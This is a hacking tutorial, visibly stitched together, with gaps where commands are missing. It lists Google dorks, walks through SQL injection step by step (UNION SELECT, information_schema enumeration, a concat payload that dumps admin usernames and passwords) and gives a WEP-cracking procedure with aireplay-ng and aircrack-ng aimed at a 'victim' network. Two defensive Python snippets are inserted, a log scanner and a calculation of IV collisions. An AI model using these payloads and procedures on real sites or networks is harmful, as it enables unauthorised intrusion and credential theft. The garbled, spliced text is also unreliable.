inurl:article.php?ID=
inurl:play_old.php?id=
inurl:declaration_more.php?decl_id=
inurl:pageid=
inurl:games.php?id=
inurl:page.php?file=
inurl:newsDetail.php?id=
inurl:gallery.php?id=
Search Google for more Google dorks to hack websites. I cannot put them on my website as
they are too critical to discuss. We can discuss them in the comments of this post, so keep
posting and reading there.
h**p://www.site.com/products.php?id=7
h**p://www.site.com/products.php?id=7
On executing it, if we get an error like this: "You have an error in your SQL syntax;
check the manual that corresponds to your MySQL server version for the right" etc.,
or something like that, that means the target website is vulnerable to SQL injection and
you can hack it.
So we have
Let's say that we have number 2 on the screen; now to check for the version we replace the
number 2 with @@version or version() and get something like 4.1.33log or 5.0.45 or similar.
i.e.
common column names are: username, user, usr, user_name, password, pass,
passwd, pwd etc.
i.e. would be
(we see number 2 on the screen like before, and that's good)
(if you get an error, then try the other column name)
we get the username displayed on screen; an example would be admin, or superadmin etc.
(if you get an error, then try the other column name)
we see the password on the screen as a hash or in plain text; it depends on how the database
is set up
i.e. md5 hash, mysql hash, sha1
Now we must complete the query to look nice.
For that we can use the concat() function (it joins strings)
i.e.
h**p://www.site.com/products.php?id=5 union all select
1,concat(username,0x3a,password),3 from admin/*
Note that I put 0x3a, the hex value for : (so 0x3a is the hex value for a colon)
7). MySQL 5
Like I said before, I'm gonna explain how to get table and column names
in MySQL greater than 5.
For this we need information_schema. It holds all tables and columns in the database.
i.e.
Here we replace our number 2 with table_name to get the first table from
information_schema.tables displayed on the screen. Now we must add LIMIT to the end of the
query to list out all tables.
i.e.
note that I put 0,1 (get 1 result starting from the 0th)
now to view the second table, we change limit 0,1 to limit 1,1
i.e.
i.e.
Keep incrementing until you get something useful like db_admin, poll_user, auth,
auth_user etc.
i.e.
The second column is displayed, so keep incrementing until you get something like
i.e.
Now we get the column name in table users displayed. Just using LIMIT we can list all
columns in table users.
Note that this won't work if magic quotes is ON.
Let's say that we found columns user, pass and email.
i.e
Example: admin:hash:whatever@blabla.com
But the passwords are in hash format, so we need to crack the hash. Note that 90% of hashes
are crackable, but 10% are still there which are unable to be cracked. So don't feel bad if
some hash doesn't crack.
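The probing sequence in this section (UNION SELECT, @@version, information_schema.tables paged with LIMIT, concat with 0x3a) leaves a recognisable trail in web server access logs. As an added example that is not part of the guide, here is a small Python scanner a defender could run over such logs to flag it. The log lines are constructed samples in Apache-style format, the indicator names are my own, and the patterns are taken from the payload shapes shown above.

```python
import re
from urllib.parse import unquote_plus

# Constructed sample access-log lines (Apache-style). Only the three
# from 10.0.0.9 carry the payload shapes described in this section.
LOG_LINES = [
    '10.0.0.5 - - [01/Jan/2016:10:00:01 +0000] "GET /products.php?id=5 HTTP/1.1" 200 1532',
    '10.0.0.9 - - [01/Jan/2016:10:00:02 +0000] "GET /products.php?id=5%20union%20all%20select%201,@@version,3/* HTTP/1.1" 200 1601',
    '10.0.0.9 - - [01/Jan/2016:10:00:03 +0000] "GET /products.php?id=5+union+all+select+1,table_name,3+from+information_schema.tables+limit+0,1/* HTTP/1.1" 200 1588',
    '10.0.0.9 - - [01/Jan/2016:10:00:04 +0000] "GET /products.php?id=5%20union%20all%20select%201,concat(username,0x3a,password),3%20from%20admin/* HTTP/1.1" 200 1590',
    '10.0.0.7 - - [01/Jan/2016:10:00:05 +0000] "GET /products.php?id=abc HTTP/1.1" 500 412',
]

# Indicator patterns, one per step of the technique described above.
INDICATORS = {
    "union_select": re.compile(r"\bunion\s+(?:all\s+)?select\b", re.I),
    "version_probe": re.compile(r"@@version|\bversion\s*\(\s*\)", re.I),
    "information_schema": re.compile(r"\binformation_schema\.", re.I),
    "limit_paging": re.compile(r"\blimit\s+\d+\s*,\s*\d+", re.I),
    "concat_extract": re.compile(r"\bconcat\s*\(", re.I),
    "hex_colon": re.compile(r"\b0x3a\b", re.I),
}

REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/')


def normalize(path):
    """URL-decode twice (catches double-encoded payloads) and lowercase."""
    return unquote_plus(unquote_plus(path)).lower()


def classify_request(path):
    """Return the indicator names matched by one request path, in INDICATORS order."""
    decoded = normalize(path)
    return [name for name, rx in INDICATORS.items() if rx.search(decoded)]


def scan_log(lines):
    """Return one record per request that matches at least one indicator."""
    hits = []
    for line in lines:
        m = REQUEST_RE.search(line)
        if not m:
            continue
        indicators = classify_request(m.group(1))
        if indicators:
            hits.append({"ip": line.split()[0], "path": m.group(1), "indicators": indicators})
    return hits


def by_source(hits):
    """Count flagged requests per client address, to surface the enumerating host."""
    counts = {}
    for h in hits:
        counts[h["ip"]] = counts.get(h["ip"], 0) + 1
    return counts


if __name__ == "__main__":
    flagged = scan_log(LOG_LINES)
    for h in flagged:
        print(h["ip"], ", ".join(h["indicators"]), h["path"], sep="  ")
    print("per source:", by_source(flagged))
```

Decoding before matching matters: the same payload arrives as %20, as + or double-encoded, and a pattern applied to the raw request line would miss two of the three sample hits. Grouping by source address then shows the one client walking through version, table and column enumeration in sequence.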
http://www.milw0rm.com/cracker/insert.php
or
http://passcracking.com/index.php
Password = OwlsNest
STEPS TO HACK WIFI OR WIRELESS PASSWORD
1. Get the Backtrack-Linux CD. Backtrack Linux Live CD (the best Linux available for hackers,
with more than 2000 hacking tools inbuilt).
Download Backtrack Linux Live CD from here: CLICK HERE
2. Get the victim to attack, that is, the one whose password you want to hack or crack.
Now insert the Backtrack Linux CD into your CD drive and start it. Once it's started, click on
the black box in the lower left corner to load up a KONSOLE. Now you should start your
Wi-Fi card. To do so, type
airmon-ng
You will see the name of your wireless card (mine is named ath0). From here on out,
replace ath0 with the name of your card. Now type
then type:
then type:
then type:
The above steps I have explained are to spoof yourself from being traced. In the above step
we are spoofing our MAC address; this will keep us undiscovered.
Now type:
airodump-ng ath0
All the above steps in one screenshot:
Now you will see a list of wireless networks in the Konsole. Some will have a better
signal than others, and it's always a good idea to pick one that has the best signal
strength; otherwise it will take a huge amount of time to crack or hack the password, or you may
not be able to crack it at all.
Once you see the network list, select the network you want to hack. To freeze
the airodump screen, HOLD the CTRL key and press C.
Now you will see something like this:
Once you've decided on a network, take note of its channel number and BSSID. The
BSSID will look something like this
00:23:69:bb:2d:of
The channel number will be under a heading that says CH,
as shown in this figure:
Now leave this Konsole window up and running and open up a 2nd Konsole window.
In this window type:
This will send some commands to the router that basically tell it to associate your
computer even though you are not officially connected with the password. If this
command is successful, you should see about 4 lines of text print out, with the last
one saying something similar to Association Successful :-)
If this happens, then good! You are almost there.
Now type:
aireplay-ng -3 -b (bssid) -h 00:11:22:33:44:55 ath0
This will generate a bunch of text, and then you will see a line where your computer is
gathering a bunch of packets and waiting on ARP and ACK. Don't worry about what
these mean; just know that these are your meal tickets. Now you just sit and wait.
Once your computer finally gathers an ARP request, it will send it back to the router
and begin to generate hundreds of ARP and ACK per second. Sometimes this starts
to happen within seconds; sometimes you have to wait up to a few minutes. Just be
patient. When it finally does happen, switch back to your first Konsole window and
you should see the number underneath the IV heading starting to rise rapidly. This is great! It
means you are almost finished! When this number reaches AT LEAST 5,000 then
you can start your password crack. It will probably take more than this, but I always
start my password cracking at 5,000 just in case they have a really weak password.
Now you need to open up a 3rd and final Konsole window. This will be where we
actually crack the password.
Now type:
aircrack-ng -b (bssid) (filename)-01.cap
Remember the file name you made up earlier? Mine was Ben. Don't put a space
between it and -01.cap here. Type it as you see it. So for me, I would type wepkey01.cap
Once you have done this you will see aircrack fire up and begin to crack the
password. Typically you have to wait for more like 10,000 to 20,000 IVs before it will
crack. If this is the case, aircrack will test what you've got so far and then it will say
something like "not enough IVs. Retry at 10,000."
DON'T DO ANYTHING! It will stay running; it is just letting you know that it is on
pause until more IVs are gathered. Once you pass the 10,000 mark it will
automatically fire up again and try to crack it. If this fails it will say "not enough IVs.
Retry at 15,000." and so on until it finally gets it.
If you do everything correctly up to this point, before too long you will have the
password! Now if the password looks goofy, don't worry, it will still work. Some
passwords are saved in ASCII format, in which case aircrack will show you exactly
what characters they typed in for their password. Sometimes, though, the password
is saved in HEX format, in which case the computer will show you the HEX
form of the password. It doesn't matter either way, because you can type in
either one and it will connect you to the network.
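The IV counts quoted above (5,000, then 10,000 to 20,000) are small because WEP's per-frame initialisation vector is only 24 bits wide, so there are just 2^24 (about 16.8 million) possible IVs and the same RC4 keystream is reused as soon as one repeats. As an added illustration that is not part of the guide, the Python below works out how quickly that happens on a network: the exact birthday-problem probability of at least one IV repeat in a capture of the size the text mentions, the expected number of repeats, and how long a busy access point takes to run through the whole IV space. The frame-rate figure in the usage is a constructed example, and the functions assume IVs drawn uniformly at random, which is the most favourable case for WEP (implementations that restarted a counter at zero after each reset did worse). This is the defender's arithmetic behind retiring WEP for WPA2 or WPA3, not a step of the cracking procedure.

```python
import math

IV_BITS = 24               # width of WEP's per-frame IV
IV_SPACE = 1 << IV_BITS    # 16,777,216 possible IVs


def iv_collision_probability(frames, iv_space=IV_SPACE):
    """Exact probability that at least one IV value repeats among `frames`
    frames, assuming each IV is chosen uniformly at random.
    Computed in log space so the product of (1 - i/N) terms does not underflow."""
    if frames > iv_space:
        return 1.0
    log_no_collision = sum(math.log1p(-i / iv_space) for i in range(frames))
    return 1.0 - math.exp(log_no_collision)


def expected_repeats(frames, iv_space=IV_SPACE):
    """Expected number of colliding IV pairs in a capture: C(frames, 2) / N."""
    return frames * (frames - 1) / 2 / iv_space


def frames_for_collision_probability(p, iv_space=IV_SPACE):
    """Smallest capture size at which P(at least one repeat) reaches p
    (inverse of the birthday-bound approximation 1 - exp(-n^2 / 2N))."""
    return math.ceil(math.sqrt(-2.0 * iv_space * math.log(1.0 - p)))


def exhaustion_time_seconds(frames_per_second, iv_space=IV_SPACE):
    """Seconds until an access point sending `frames_per_second` has necessarily
    emitted every IV at least once (a counter-based IV wraps at this point)."""
    return iv_space / frames_per_second


if __name__ == "__main__":
    for n in (5000, 10000, 20000):   # the capture sizes the text mentions
        print(f"{n:>6} frames: P(repeat) = {iv_collision_probability(n):.3f}, "
              f"expected repeats = {expected_repeats(n):.1f}")
    print("frames for a 50% chance of a repeat:", frames_for_collision_probability(0.5))
    # Constructed example rate: 1,000 frames/s on a busy access point.
    print("hours to exhaust the IV space at 1000 frames/s:",
          round(exhaustion_time_seconds(1000) / 3600, 2))
```

At 5,000 frames a repeat is already more likely than not, at 20,000 frames about a dozen keystream reuses are expected, and at a thousand frames per second the entire IV space is cycled in under five hours; no key length or key strength changes these numbers, which is why the cracking step above needs only a capture of a few minutes.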
Take note, though, that the password will always be displayed in aircrack with a
colon after every 2 characters. So for instance if the password was secret, it would
be displayed as:
se:cr:et
This would obviously be the ASCII format. If it was a HEX encrypted password that
was something like 0FKW9427VF then it would still display as:
0F:KW:94:27:VF
Just omit the colons from the password, boot back into whatever operating system
you use, try to connect to the network and type in the password without the colons
and presto! You are in!
It may seem like a lot to deal with if you have never done it, but after a few successful
attempts, you will get very quick with it. If I am near a WEP encrypted router with a
good signal, I can often crack the password in just a couple of minutes.
I am not responsible for what you do with this information. Any malicious/illegal
activity that you do falls completely on you because, technically, this is just for you
to test the security of your own network.
I hope you all liked it. If you have any queries then ask me.